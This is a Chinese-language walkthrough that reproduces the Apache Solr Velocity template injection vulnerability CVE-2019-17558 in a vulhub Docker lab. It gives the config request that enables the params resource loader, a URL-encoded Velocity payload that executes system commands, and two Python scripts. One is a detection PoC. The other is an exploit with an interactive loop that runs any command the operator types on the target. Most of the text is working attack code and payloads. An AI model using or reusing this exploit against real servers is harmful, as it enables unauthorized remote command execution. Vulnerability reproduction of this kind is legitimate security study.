环境搭建:
使用vulhub,进入对应文件夹启动环境:
[root@localhost ~]# cd /home/vulhub/solr/CVE-2019-17558/
[root@localhost CVE-2019-17558]# docker-compose up -d
查看端口:
[root@localhost CVE-2019-17558]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
097953dccacc vulhub/solr:8.2.0 "docker-entrypoint.s…" 23 minutes ago Up 23 minutes 0.0.0.0:8983->8983/tcp, :::8983->8983/tcp cve-2019-17558_solr_1
[root@localhost CVE-2019-17558]#
漏洞复现:
默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心:
http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json
Vulhub里唯一的核心是demo:
通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:
POST /solr/demo/config HTTP/1.1
Host: 192.168.10.10:8983
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
之后,注入Velocity模板即可执行任意命令:
http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
POC编写:
import requests,re
url = "http://192.168.10.10:8983/"
api = "solr/admin/cores?indexInfo=false&wt=json"
api_res = requests.get(url+api) # 获取所有的核心
name = re.findall('"name":"(.*)",',api_res.text)
for i in name[0:2]: # 遍历3个核心开启params.resource.loader.enabled
enabled = url + f"/solr/{i}/config"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
"params.resource.loader.enabled": "true",
"solr.resource.loader.enabled": "true", "startup": "lazy",
"template.base.dir": ""}}
requests.post(enabled, headers=burp0_headers, json=burp0_json) # 开启params.resource.loader.enabled
poc = f"solr/{i}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo wwwq%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
res = requests.get(url + poc)
if "wwwq" in res.text[0:20]: #执行的 echo wwwq 命令
print("CVE-2019-17558 存在")
pycharm运行结果:
EXP编写:
import requests,re
url = "http://192.168.10.10:8983/"
api = "solr/admin/cores?indexInfo=false&wt=json"
api_res = requests.get(url+api) # 获取所有的核心
name = re.findall('"name":"(.*)",',api_res.text)
for i in name[0:2]: # 遍历3个核心开启params.resource.loader.enabled
enabled = url + f"/solr/{i}/config"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
"params.resource.loader.enabled": "true",
"solr.resource.loader.enabled": "true", "startup": "lazy",
"template.base.dir": ""}}
requests.post(enabled, headers=burp0_headers, json=burp0_json) # 开启params.resource.loader.enabled
poc = f"solr/{i}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo wwwq%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
res = requests.get(url + poc)
if "wwwq" in res.text[0:20]: #执行的 echo wwwq 命令
print("CVE-2019-17558 存在")
while 1 :
exp = poc.replace("echo wwwq",input("请输入你要执行的命令:"))
print(requests.get(url + exp).text[8:-1])
pycharm运行结果: